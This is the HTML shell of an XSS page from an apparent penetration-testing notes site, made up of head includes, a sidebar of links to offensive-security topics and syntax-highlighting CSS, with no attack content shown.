husk/build/exploit/web/xss.html

<!doctype html>
<html lang="en">
    <center>
    <head>


        <script src="https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js"></script>
        <!-- mathjax -->
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="/static/js/auto-complete.js"></script>
<script type="text/javascript" src="/static/js/lunr.min.js"></script>
<script type="text/javascript" src="/static/js/search.js"></script>
        <link rel="stylesheet" href="/static/stylesheet.css">
        <link rel="stylesheet" href="/static/auto-complete.css">
        <br>
        <title>In the Open</title>
        <meta name="viewport" content="width=device-width, initial-scale=1">


    </head>
    <body>
        <!-- topmenu -->
    <div class="menu">
    <a href="/" style="text-decoration:none">In the Open</a>
    </div>
    <div class="search-container">
        <label for="search-by"><i class="fas fa-search"></i></label>
        <input data-search-input="" id="search-by" type="search" placeholder="Search..." autocomplete="off">
        <!--button type="submit"><i class="search"></i>&#128269;</button>-->
        <span data-search-clear=""><i class="fas fa-times"></i></span>
    </div>

</div>
    <div class="menu">
    </div>
    <!--br><br-->
    </center>
<p></p>
        <div class="columns">
        <!-- Sidebar -->
<div class="column column-1">
  <ul><details id=crypto ontoggle="linkClick(this); return false;" ><summary>Crypto</summary><ul><details id=openssl ontoggle="linkClick(this); return false;" ><summary>Openssl</summary><ul><li><a href="/crypto/openssl/openssl.html">openssl</a></li><li><a href="/crypto/openssl/openssl_engine.html">openssl_engine</a></li></ul></details><li><a href="/crypto/rsa.html">rsa</a></li></ul></details><details id=enumeration ontoggle="linkClick(this); return false;" ><summary>Enumeration</summary><ul><details id=containers ontoggle="linkClick(this); return false;" ><summary>Containers</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/enumeration/docs/aws.html">aws</a></li><li><a href="/enumeration/docs/cewl.html">cewl</a></li><li><a href="/enumeration/docs/dns.html">dns</a></li><li><a href="/enumeration/docs/docker_enumeration.html">docker_enumeration</a></li><li><a href="/enumeration/docs/ffuf.html">ffuf</a></li><li><a href="/enumeration/docs/gobuster.html">gobuster</a></li><li><a href="/enumeration/docs/kerberoast.html">kerberoast</a></li><li><a href="/enumeration/docs/kubectl.html">kubectl</a></li><li><a href="/enumeration/docs/ldap.html">ldap</a></li><li><a href="/enumeration/docs/linux_basics.html">linux_basics</a></li><li><a href="/enumeration/docs/microk8s.html">microk8s</a></li><li><a href="/enumeration/docs/nfs.html">nfs</a></li><li><a href="/enumeration/docs/nikto.html">nikto</a></li><li><a href="/enumeration/docs/nmap.html">nmap</a></li><li><a href="/enumeration/docs/port_knocking.html">port_knocking</a></li><li><a href="/enumeration/docs/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/docs/rsync.html">rsync</a></li><li><a href="/enumeration/docs/rustscan.html">rustscan</a></li><li><a href="/enumeration/docs/shodan.html">shodan</a></li><details id=snmp ontoggle="linkClick(this); return false;" ><summary>Snmp</summary><ul><li><a href="/enumeration/docs/snmp/onesixtyone.html">onesixtyone</a></li><li><a href="/enumeration/docs/snmp/snmpcheck.html">snmpcheck</a></li></ul></details><li><a href="/enumeration/docs/websites.html">websites</a></li><li><a href="/enumeration/docs/wfuzz.html">wfuzz</a></li><li><a href="/enumeration/docs/wpscan.html">wpscan</a></li></ul></details><details id=network_scanners ontoggle="linkClick(this); return false;" ><summary>Network_scanners</summary><ul></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/enumeration/windows/bloodhound.html">bloodhound</a></li><li><a href="/enumeration/windows/event_log.html">event_log</a></li><li><a href="/enumeration/windows/manual_enum.html">manual_enum</a></li><li><a href="/enumeration/windows/powershell.html">powershell</a></li><li><a href="/enumeration/windows/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/windows/sysinternals.html">sysinternals</a></li><li><a href="/enumeration/windows/sysmon.html">sysmon</a></li><li><a href="/enumeration/windows/vss.html">vss</a></li></ul></details></ul></details><details id=exfiltration ontoggle="linkClick(this); return false;" ><summary>Exfiltration</summary><ul><details id=dns ontoggle="linkClick(this); return false;" ><summary>Dns</summary><ul><li><a href="/exfiltration/dns/dns.html">dns</a></li></ul></details><details id=linux ontoggle="linkClick(this); return false;" ><summary>Linux</summary><ul><li><a href="/exfiltration/linux/nc.html">nc</a></li><li><a href="/exfiltration/linux/wget.html">wget</a></li></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/exfiltration/windows/evil-winrm.html">evil-winrm</a></li><li><a href="/exfiltration/windows/loot.html">loot</a></li><li><a href="/exfiltration/windows/smb_connection.html">smb_connection</a></li></ul></details></ul></details><details id=exploit ontoggle="linkClick(this); return false;" ><summary>Exploit</summary><ul><details id=CPUs ontoggle="linkClick(this); return false;" ><summary>CPUs</summary><ul><li><a href="/exploit/CPUs/meltdown.html">meltdown</a></li></ul></details><details id=binaries ontoggle="linkClick(this); return false;" ><summary>Binaries</summary><ul><li><a href="/exploit/binaries/aslr.html">aslr</a></li><details id=buffer_overflow ontoggle="linkClick(this); return false;" ><summary>Buffer_overflow</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/exploit/binaries/buffer_overflow/docs/amd64.html">amd64</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/amd64_instructions.html">amd64_instructions</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/buffer_overflow.html">buffer_overflow</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.html">cut_stack_in_half</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/pwntools_specifics.html">pwntools_specifics</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/ret_address_reuse.html">ret_address_reuse</a></li></ul></details><li><a href="/exploit/binaries/buffer_overflow/ropping.html">ropping</a></li></ul></details><details id=canary_bypass ontoggle="linkClick(this); return false;" ><summary>Canary_bypass</summary><ul><li><a href="/exploit/binaries/canary_bypass/canary_bypass.html">canary_bypass</a></li></ul></details><details id=format_string ontoggle="linkClick(this); return false;" ><summary>Format_string</summary><ul><li><a href="/exploit/binaries/format_string/format_string.html">format_string</a></li></ul></details><details id=integral_promotion ontoggle="linkClick(this); return false;" ><summary>Integral_promotion</summary><ul><li><a href="/exploit/binaries/integral_promotion/integral_promotion.html">integral_promotion</a></li></ul></details><li><a href="/exploit/binaries/plt_got.html">plt_got</a></li><li><a href="/exploit/binaries/r2.html">r2</a></li><li><a href="/exploit/binaries/ret2libc.html">ret2libc</a></li></ul></details><details id=dns ontoggle="linkClick(this); return false;" ><summary>Dns</summary><ul><li><a href="/exploit/dns/zone_transfer.html">zone_transfer</a></li></ul></details><details id=hashes ontoggle="linkClick(this); return false;" ><summary>Hashes</summary><ul><li><a href="/exploit/hashes/collision.html">collision</a></li></ul></details><details id=imagemagick ontoggle="linkClick(this); return false;" ><summary>Imagemagick</summary><ul><li><a href="/exploit/imagemagick/imagetragick.html">imagetragick</a></li></ul></details><details id=java ontoggle="linkClick(this); return false;" ><summary>Java</summary><ul><details id=OGNL ontoggle="linkClick(this); return false;" ><summary>OGNL</summary><ul><li><a href="/exploit/java/OGNL/cve_2022_26134.html">cve_2022_26134</a></li></ul></details><li><a href="/exploit/java/ghidra_debug.html">ghidra_debug</a></li><li><a href="/exploit/java/ghostcat.html">ghostcat</a></li><li><a href="/exploit/java/log4shell.html">log4shell</a></li><li><a href="/exploit/java/spring4shell.html">spring4shell</a></li></ul></details><details id=level3_hypervisor ontoggle="linkClick(this); return false;" ><summary>Level3_hypervisor</summary><ul><details id=docker_sec ontoggle="linkClick(this); return false;" ><summary>Docker_sec</summary><ul><li><a href="/exploit/level3_hypervisor/docker_sec/docker.html">docker</a></li></ul></details><li><a href="/exploit/level3_hypervisor/kubernetes.html">kubernetes</a></li><li><a href="/exploit/level3_hypervisor/lxc.html">lxc</a></li><li><a href="/exploit/level3_hypervisor/microk8s.html">microk8s</a></li></ul></details><details id=linux ontoggle="linkClick(this); return false;" ><summary>Linux</summary><ul><li><a href="/exploit/linux/capabilities.html">capabilities</a></li><details id=dirty_pipe ontoggle="linkClick(this); return false;" ><summary>Dirty_pipe</summary><ul><li><a href="/exploit/linux/dirty_pipe/dirty_pipe.html">dirty_pipe</a></li></ul></details><li><a href="/exploit/linux/exiftool.html">exiftool</a></li><li><a href="/exploit/linux/groups.html">groups</a></li><li><a href="/exploit/linux/ld_preload.html">ld_preload</a></li><li><a href="/exploit/linux/nfs_rootsquash.html">nfs_rootsquash</a></li><li><a href="/exploit/linux/overlayfs.html">overlayfs</a></li><details id=pkexec ontoggle="linkClick(this); return false;" ><summary>Pkexec</summary><ul><li><a href="/exploit/linux/pkexec/CVE_2021_4034.html">CVE_2021_4034</a></li></ul></details><li><a href="/exploit/linux/polkit.html">polkit</a></li><li><a href="/exploit/linux/racing_conditions.html">racing_conditions</a></li><li><a href="/exploit/linux/setcap.html">setcap</a></li><li><a href="/exploit/linux/shared_object_injection.html">shared_object_injection</a></li><li><a href="/exploit/linux/shell_shock.html">shell_shock</a></li><details id=sudo ontoggle="linkClick(this); return false;" ><summary>Sudo</summary><ul><li><a href="/exploit/linux/sudo/CVE_2019_14287.html">CVE_2019_14287</a></li><li><a href="/exploit/linux/sudo/CVE_2019_18634.html">CVE_2019_18634</a></li><li><a href="/exploit/linux/sudo/baron_samedit.html">baron_samedit</a></li><li><a href="/exploit/linux/sudo/tokens.html">tokens</a></li></ul></details><li><a href="/exploit/linux/wildard_exploitation.html">wildard_exploitation</a></li></ul></details><details id=macOS ontoggle="linkClick(this); return false;" ><summary>MacOS</summary><ul></ul></details><details id=network ontoggle="linkClick(this); return false;" ><summary>Network</summary><ul><li><a href="/exploit/network/mac_spoofing.html">mac_spoofing</a></li></ul></details><details id=padding ontoggle="linkClick(this); return false;" ><summary>Padding</summary><ul><li><a href="/exploit/padding/padbuster.html">padbuster</a></li></ul></details><details id=python ontoggle="linkClick(this); return false;" ><summary>Python</summary><ul><li><a href="/exploit/python/code_injection.html">code_injection</a></li><li><a href="/exploit/python/jail_escape.html">jail_escape</a></li><li><a href="/exploit/python/lib_hijack.html">lib_hijack</a></li><li><a href="/exploit/python/pickle.html">pickle</a></li><li><a href="/exploit/python/pwntools.html">pwntools</a></li><li><a href="/exploit/python/pyc.html">pyc</a></li><li><a href="/exploit/python/scapy.html">scapy</a></li></ul></details><details id=samba ontoggle="linkClick(this); return false;" ><summary>Samba</summary><ul><li><a href="/exploit/samba/smbmap.html">smbmap</a></li></ul></details><details id=sqli ontoggle="linkClick(this); return false;" ><summary>Sqli</summary><ul><li><a href="/exploit/sqli/mssql.html">mssql</a></li><li><a href="/exploit/sqli/no_sqli.html">no_sqli</a></li><li><a href="/exploit/sqli/sqli.html">sqli</a></li><li><a href="/exploit/sqli/sqlmap.html">sqlmap</a></li></ul></details><details id=ssl_tls ontoggle="linkClick(this); return false;" ><summary>Ssl_tls</summary><ul><li><a href="/exploit/ssl_tls/heartbleed.html">heartbleed</a></li></ul></details><details id=web ontoggle="linkClick(this); return false;" ><summary>Web</summary><ul><details id=bypass_rate_limiting ontoggle="linkClick(this); return false;" ><summary>Bypass_rate_limiting</summary><ul><li><a href="/exploit/web/bypass_rate_limiting/bypass_rate_limiting.html">bypass_rate_limiting</a></li></ul></details><li><a href="/exploit/web/command_injection.html">command_injection</a></li><details id=content_security_policy ontoggle="linkClick(this); return false;" ><summary>Content_security_policy</summary><ul><li><a href="/exploit/web/content_security_policy/content_security_policy.html">content_security_policy</a></li></ul></details><li><a href="/exploit/web/cookie_tampering.html">cookie_tampering</a></li><li><a href="/exploit/web/csrf.html">csrf</a></li><details id=forced_browsing ontoggle="linkClick(this); return false;" ><summary>Forced_browsing</summary><ul><li><a href="/exploit/web/forced_browsing/forced_browsing.html">forced_browsing</a></li></ul></details><li><a href="/exploit/web/http_header_injection.html">http_header_injection</a></li><details id=idor ontoggle="linkClick(this); return false;" ><summary>Idor</summary><ul><li><a href="/exploit/web/idor/idor.html">idor</a></li></ul></details><details id=javascript ontoggle="linkClick(this); return false;" ><summary>Javascript</summary><ul><li><a href="/exploit/web/javascript/bypass_filters.html">bypass_filters</a></li><li><a href="/exploit/web/javascript/prototype_pollution.html">prototype_pollution</a></li></ul></details><details id=jwt ontoggle="linkClick(this); return false;" ><summary>Jwt</summary><ul><li><a href="/exploit/web/jwt/jwt.html">jwt</a></li></ul></details><li><a href="/exploit/web/local_file_inclusion.html">local_file_inclusion</a></li><li><a href="/exploit/web/methodology.html">methodology</a></li><details id=nodejs ontoggle="linkClick(this); return false;" ><summary>Nodejs</summary><ul><li><a href="/exploit/web/nodejs/deserialization.html">deserialization</a></li></ul></details><details id=php ontoggle="linkClick(this); return false;" ><summary>Php</summary><ul><li><a href="/exploit/web/php/command_injection.html">command_injection</a></li><li><a href="/exploit/web/php/password_reset.html">password_reset</a></li><li><a href="/exploit/web/php/php_base64_filter.html">php_base64_filter</a></li><li><a href="/exploit/web/php/php_image_exif.html">php_image_exif</a></li><li><a href="/exploit/web/php/php_user_agent_rce.html">php_user_agent_rce</a></li><li><a href="/exploit/web/php/preload_lib.html">preload_lib</a></li><li><a href="/exploit/web/php/unserialize.html">unserialize</a></li></ul></details><li><a href="/exploit/web/re_registration.html">re_registration</a></li><li><a href="/exploit/web/remote_file_inclusion.html">remote_file_inclusion</a></li><details id=ssrf ontoggle="linkClick(this); return false;" ><summary>Ssrf</summary><ul><li><a href="/exploit/web/ssrf/iframe.html">iframe</a></li><li><a href="/exploit/web/ssrf/ssrf.html">ssrf</a></li></ul></details><details id=ssti ontoggle="linkClick(this); return false;" ><summary>Ssti</summary><ul><li><a href="/exploit/web/ssti/ssti.html">ssti</a></li></ul></details><li><a href="/exploit/web/url_forgery.html">url_forgery</a></li><li><a href="/exploit/web/wordpress.html">wordpress</a></li><li><a href="/exploit/web/xpath.html">xpath</a></li><li><a href="/exploit/web/xss.html">xss</a></li><details id=xxe ontoggle="linkClick(this); return false;" ><summary>Xxe</summary><ul><li><a href="/exploit/web/xxe/wp_xxe_.html">wp_xxe_</a></li><li><a href="/exploit/web/xxe/xml_external_entity.html">xml_external_entity</a></li></ul></details></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><details id=dll_hijacking ontoggle="linkClick(this); return false;" ><summary>Dll_hijacking</summary><ul><li><a href="/exploit/windows/dll_hijacking/dll_hijacking.html">dll_hijacking</a></li></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/exploit/windows/docs/always_installed_elevated.html">always_installed_elevated</a></li><li><a href="/exploit/windows/docs/crackmapexec.html">crackmapexec</a></li><li><a href="/exploit/windows/docs/dpapi.html">dpapi</a></li><li><a href="/exploit/windows/docs/impacket.html">impacket</a></li><li><a href="/exploit/windows/docs/llmnr.html">llmnr</a></li><li><a href="/exploit/windows/docs/lnk_exploit.html">lnk_exploit</a></li><li><a href="/exploit/windows/docs/pass_the_hash.html">pass_the_hash</a></li><li><a href="/exploit/windows/docs/password_in_registry.html">password_in_registry</a></li><li><a href="/exploit/windows/docs/potatoes.html">potatoes</a></li><li><a href="/exploit/windows/docs/printnightmare.html">printnightmare</a></li><li><a href="/exploit/windows/docs/responder.html">responder</a></li><li><a href="/exploit/windows/docs/unquoted_path.html">unquoted_path</a></li></ul></details><details id=macros ontoggle="linkClick(this); return false;" ><summary>Macros</summary><ul><li><a href="/exploit/windows/macros/macros.html">macros</a></li></ul></details><details id=payloads ontoggle="linkClick(this); return false;" ><summary>Payloads</summary><ul><li><a href="/exploit/windows/payloads/windows_scripting_host.html">windows_scripting_host</a></li></ul></details><details id=print_nightmare ontoggle="linkClick(this); return false;" ><summary>Print_nightmare</summary><ul><details id=CVE-2021-1675 ontoggle="linkClick(this); return false;" ><summary>CVE-2021-1675</summary><ul><details id=nightmare-dll ontoggle="linkClick(this); return false;" ><summary>Nightmare-dll</summary><ul></ul></details></ul></details><li><a href="/exploit/windows/print_nightmare/print_nightmare.html">print_nightmare</a></li></ul></details><details id=process_injection ontoggle="linkClick(this); return false;" ><summary>Process_injection</summary><ul><li><a href="/exploit/windows/process_injection/dll_injection.html">dll_injection</a></li><li><a href="/exploit/windows/process_injection/process_hollowing.html">process_hollowing</a></li><li><a href="/exploit/windows/process_injection/shellcode_injection.html">shellcode_injection</a></li><li><a href="/exploit/windows/process_injection/thread_hijacking.html">thread_hijacking</a></li></ul></details><details id=service_escalation ontoggle="linkClick(this); return false;" ><summary>Service_escalation</summary><ul><li><a href="/exploit/windows/service_escalation/service_escalation.html">service_escalation</a></li></ul></details><details id=zero_logon ontoggle="linkClick(this); return false;" ><summary>Zero_logon</summary><ul><li><a href="/exploit/windows/zero_logon/zero_logon.html">zero_logon</a></li></ul></details></ul></details><details id=yaml ontoggle="linkClick(this); return false;" ><summary>Yaml</summary><ul><li><a href="/exploit/yaml/deserialization.html">deserialization</a></li></ul></details></ul></details><details id=forensics ontoggle="linkClick(this); return false;" ><summary>Forensics</summary><ul><li><a href="/forensics/ios.html">ios</a></li><li><a href="/forensics/kape.html">kape</a></li><li><a href="/forensics/ntfs.html">ntfs</a></li><li><a href="/forensics/oletools.html">oletools</a></li><li><a href="/forensics/volatility.html">volatility</a></li><li><a href="/forensics/windows_registry.html">windows_registry</a></li></ul></details><details id=hashes ontoggle="linkClick(this); return false;" ><summary>Hashes</summary><ul><details id=bruteforce ontoggle="linkClick(this); return false;" ><summary>Bruteforce</summary><ul></ul></details><li><a href="/hashes/generate_wordlists.html">generate_wordlists</a></li><li><a href="/hashes/haiti.html">haiti</a></li><li><a href="/hashes/hashcat_utils.html">hashcat_utils</a></li><details id=password_cracking ontoggle="linkClick(this); return false;" ><summary>Password_cracking</summary><ul><li><a href="/hashes/password_cracking/hydra.html">hydra</a></li><li><a href="/hashes/password_cracking/john.html">john</a></li><li><a href="/hashes/password_cracking/smb_challenge.html">smb_challenge</a></li><li><a href="/hashes/password_cracking/sucrack.html">sucrack</a></li><li><a href="/hashes/password_cracking/vnc.html">vnc</a></li></ul></details><details id=password_guessing ontoggle="linkClick(this); return false;" ><summary>Password_guessing</summary><ul><li><a href="/hashes/password_guessing/standard_passwords.html">standard_passwords</a></li></ul></details></ul></details><details id=misc ontoggle="linkClick(this); return false;" ><summary>Misc</summary><ul><details id=active_directory ontoggle="linkClick(this); return false;" ><summary>Active_directory</summary><ul><li><a href="/misc/active_directory/AD_CS.html">AD_CS</a></li><li><a href="/misc/active_directory/active_directory.html">active_directory</a></li><li><a href="/misc/active_directory/ad_enumeration.html">ad_enumeration</a></li><li><a href="/misc/active_directory/ad_misconfiguration.html">ad_misconfiguration</a></li><li><a href="/misc/active_directory/ad_persistence.html">ad_persistence</a></li><li><a href="/misc/active_directory/gaining_foothold_AD.html">gaining_foothold_AD</a></li><li><a href="/misc/active_directory/lateral_movement.html">lateral_movement</a></li></ul></details><li><a href="/misc/bash.html">bash</a></li><li><a href="/misc/clamav.html">clamav</a></li><li><a href="/misc/gitTools.html">gitTools</a></li><li><a href="/misc/hadoop.html">hadoop</a></li><li><a href="/misc/metasploit.html">metasploit</a></li><details id=printer_hacking ontoggle="linkClick(this); return false;" ><summary>Printer_hacking</summary><ul><li><a href="/misc/printer_hacking/preta.html">preta</a></li></ul></details><li><a href="/misc/responder.html">responder</a></li><li><a href="/misc/sandbox_evasion.html">sandbox_evasion</a></li><li><a href="/misc/smtp.html">smtp</a></li><li><a href="/misc/snort.html">snort</a></li><details id=telecommunications ontoggle="linkClick(this); return false;" ><summary>Telecommunications</summary><ul><details id=_sipvicious ontoggle="linkClick(this); return false;" ><summary>_sipvicious</summary><ul><details id=.github ontoggle="linkClick(this); return false;" ><summary>.github</summary><ul><details id=ISSUE_TEMPLATE ontoggle="linkClick(this); return false;" ><summary>ISSUE_TEMPLATE</summary><ul><li><a href="/misc/telecommunications/_sipvicious/.github/ISSUE_TEMPLATE/bug-report.html">bug-report</a></li><li><a href="/misc/telecommunications/_sipvicious/.github/ISSUE_TEMPLATE/custom.html">custom</a></li></ul></details></ul></details><details id=sipvicious ontoggle="linkClick(this); return false;" ><summary>Sipvicious</summary><ul></ul></details></ul></details><li><a href="/misc/telecommunications/sip_vicious.html">sip_vicious</a></li></ul></details><details id=threat_intelligence ontoggle="linkClick(this); return false;" ><summary>Threat_intelligence</summary><ul><li><a href="/misc/threat_intelligence/isac.html">isac</a></li><li><a href="/misc/threat_intelligence/loki.html">loki</a></li><li><a href="/misc/threat_intelligence/osquery.html">osquery</a></li><li><a href="/misc/threat_intelligence/pithus.html">pithus</a></li><li><a href="/misc/threat_intelligence/siem.html">siem</a></li><li><a href="/misc/threat_intelligence/splunk.html">splunk</a></li><li><a href="/misc/threat_intelligence/yara.html">yara</a></li></ul></details><details id=wifi ontoggle="linkClick(this); return false;" ><summary>Wifi</summary><ul><li><a href="/misc/wifi/airmon-ng.html">airmon-ng</a></li></ul></details></ul></details><details id=osint ontoggle="linkClick(this); return false;" ><summary>Osint</summary><ul><li><a href="/osint/recon_ng.html">recon_ng</a></li><details id=social_engineering ontoggle="linkClick(this); return false;" ><summary>Social_engineering</summary><ul><li><a href="/osint/social_engineering/gophish.html">gophish</a></li><li><a href="/osint/social_engineering/phishing_domain.html">phishing_domain</a></li></ul></details><li><a href="/osint/spiderfoot.html">spiderfoot</a></li><li><a href="/osint/theharvester.html">theharvester</a></li></ul></details><details id=persistence ontoggle="linkClick(this); return false;" ><summary>Persistence</summary><ul><li><a href="/persistence/bashrc.html">bashrc</a></li><li><a href="/persistence/crontab.html">crontab</a></li><li><a href="/persistence/meterpreter.html">meterpreter</a></li><li><a href="/persistence/persistence.html">persistence</a></li><li><a href="/persistence/wmi.html">wmi</a></li></ul></details><details id=post exploitation ontoggle="linkClick(this); return false;" ><summary>Post exploitation</summary><ul><details id=Seatbelt ontoggle="linkClick(this); return false;" ><summary>Seatbelt</summary><ul><details id=.github ontoggle="linkClick(this); return false;" ><summary>.github</summary><ul><details id=ISSUE_TEMPLATE ontoggle="linkClick(this); return false;" ><summary>ISSUE_TEMPLATE</summary><ul><li><a href="/post exploitation/Seatbelt/.github/ISSUE_TEMPLATE/bug_report.html">bug_report</a></li><li><a href="/post exploitation/Seatbelt/.github/ISSUE_TEMPLATE/feature_request.html">feature_request</a></li></ul></details></ul></details><li><a href="/post exploitation/Seatbelt/CHANGELOG.html">CHANGELOG</a></li><details id=Seatbelt ontoggle="linkClick(this); return false;" ><summary>Seatbelt</summary><ul><details id=Commands ontoggle="linkClick(this); return false;" ><summary>Commands</summary><ul><details id=Windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><details id=EventLogs ontoggle="linkClick(this); return false;" ><summary>EventLogs</summary><ul></ul></details></ul></details></ul></details><details id=Output ontoggle="linkClick(this); return false;" ><summary>Output</summary><ul></ul></details></ul></details></ul></details><details id=bc_security ontoggle="linkClick(this); return false;" ><summary>Bc_security</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/post exploitation/docs/c2.html">c2</a></li><li><a href="/post exploitation/docs/crackmapexec.html">crackmapexec</a></li><li><a href="/post exploitation/docs/empire.html">empire</a></li><li><a href="/post exploitation/docs/ids_ips_evation.html">ids_ips_evation</a></li><li><a href="/post exploitation/docs/linux.html">linux</a></li><li><a href="/post exploitation/docs/metasploit.html">metasploit</a></li><li><a href="/post exploitation/docs/mimikatz.html">mimikatz</a></li><li><a href="/post exploitation/docs/mitm.html">mitm</a></li><li><a href="/post exploitation/docs/nfs_root_squash.html">nfs_root_squash</a></li><li><a href="/post exploitation/docs/powershell.html">powershell</a></li><li><a href="/post exploitation/docs/secretsdump.html">secretsdump</a></li><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/post exploitation/docs/windows/antivirus_evasion.html">antivirus_evasion</a></li><li><a href="/post exploitation/docs/windows/applocker.html">applocker</a></li><li><a href="/post exploitation/docs/windows/evade_event_tracing.html">evade_event_tracing</a></li><li><a href="/post exploitation/docs/windows/living_off_the_land.html">living_off_the_land</a></li><li><a href="/post exploitation/docs/windows/pass_the_hash.html">pass_the_hash</a></li><li><a href="/post exploitation/docs/windows/powershell_logs.html">powershell_logs</a></li><li><a href="/post exploitation/docs/windows/registry.html">registry</a></li><li><a href="/post exploitation/docs/windows/sebackupprivilege.html">sebackupprivilege</a></li><li><a href="/post exploitation/docs/windows/user_account_control.html">user_account_control</a></li></ul></details></ul></details><li><a href="/post exploitation/pivoting.html">pivoting</a></li><details id=priv_esc ontoggle="linkClick(this); return false;" ><summary>Priv_esc</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/post exploitation/priv_esc/docs/linux_priv_esc.html">linux_priv_esc</a></li><li><a href="/post exploitation/priv_esc/docs/pspy.html">pspy</a></li><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/post exploitation/priv_esc/docs/windows/add_user.html">add_user</a></li><li><a href="/post exploitation/priv_esc/docs/windows/windows_priv_esc.html">windows_priv_esc</a></li></ul></details></ul></details><details id=kernel-exploits ontoggle="linkClick(this); return false;" ><summary>Kernel-exploits</summary><ul></ul></details><details id=privesc-scripts ontoggle="linkClick(this); return false;" ><summary>Privesc-scripts</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/post exploitation/priv_esc/privesc-scripts/docs/get_script_onto_target.html">get_script_onto_target</a></li></ul></details></ul></details><details id=suid ontoggle="linkClick(this); return false;" ><summary>Suid</summary><ul></ul></details></ul></details></ul></details><details id=reverse engineering ontoggle="linkClick(this); return false;" ><summary>Reverse engineering</summary><ul><details id=android ontoggle="linkClick(this); return false;" ><summary>Android</summary><ul><li><a href="/reverse engineering/android/misc.html">misc</a></li></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/reverse engineering/docs/deobfuscation.html">deobfuscation</a></li><li><a href="/reverse engineering/docs/dll_reversing.html">dll_reversing</a></li><li><a href="/reverse engineering/docs/firmware.html">firmware</a></li><li><a href="/reverse engineering/docs/function_mangling.html">function_mangling</a></li><li><a href="/reverse engineering/docs/scada.html">scada</a></li></ul></details><details id=java ontoggle="linkClick(this); return false;" ><summary>Java</summary><ul><li><a href="/reverse engineering/java/krakatau.html">krakatau</a></li></ul></details></ul></details><details id=reverse shells ontoggle="linkClick(this); return false;" ><summary>Reverse shells</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/reverse shells/docs/evil-winrm.html">evil-winrm</a></li><li><a href="/reverse shells/docs/msfconsole.html">msfconsole</a></li><li><a href="/reverse shells/docs/msfvenom.html">msfvenom</a></li><li><a href="/reverse shells/docs/netcat.html">netcat</a></li><li><a href="/reverse shells/docs/powershell.html">powershell</a></li><li><a href="/reverse shells/docs/shell_upgrade.html">shell_upgrade</a></li><li><a href="/reverse shells/docs/socat.html">socat</a></li><li><a href="/reverse shells/docs/webshell.html">webshell</a></li></ul></details><li><a href="/reverse shells/firewalls.html">firewalls</a></li><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul></ul></details></ul></details><details id=stego ontoggle="linkClick(this); return false;" ><summary>Stego</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/stego/docs/outguess.html">outguess</a></li><li><a href="/stego/docs/remnux.html">remnux</a></li><li><a href="/stego/docs/stegbrute.html">stegbrute</a></li><li><a href="/stego/docs/steghide.html">steghide</a></li><li><a href="/stego/docs/stegoveritas.html">stegoveritas</a></li><li><a href="/stego/docs/zsteg.html">zsteg</a></li></ul></details></ul></details>
</ul>
</div>
<div class="column column-2">
       <span class="body">
           <style>pre { line-height: 125%; }
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
.codehilite .hll { background-color: #2C3B41 }
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
.codehilite .err { color: #FF5370 } /* Error */
.codehilite .esc { color: #89DDFF } /* Escape */
.codehilite .g { color: #EEFFFF } /* Generic */
.codehilite .k { color: #BB80B3 } /* Keyword */
.codehilite .l { color: #C3E88D } /* Literal */
.codehilite .n { color: #EEFFFF } /* Name */
.codehilite .o { color: #89DDFF } /* Operator */
.codehilite .p { color: #89DDFF } /* Punctuation */
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
.codehilite .gr { color: #FF5370 } /* Generic.Error */
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
.codehilite .go { color: #546E7A } /* Generic.Output */
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
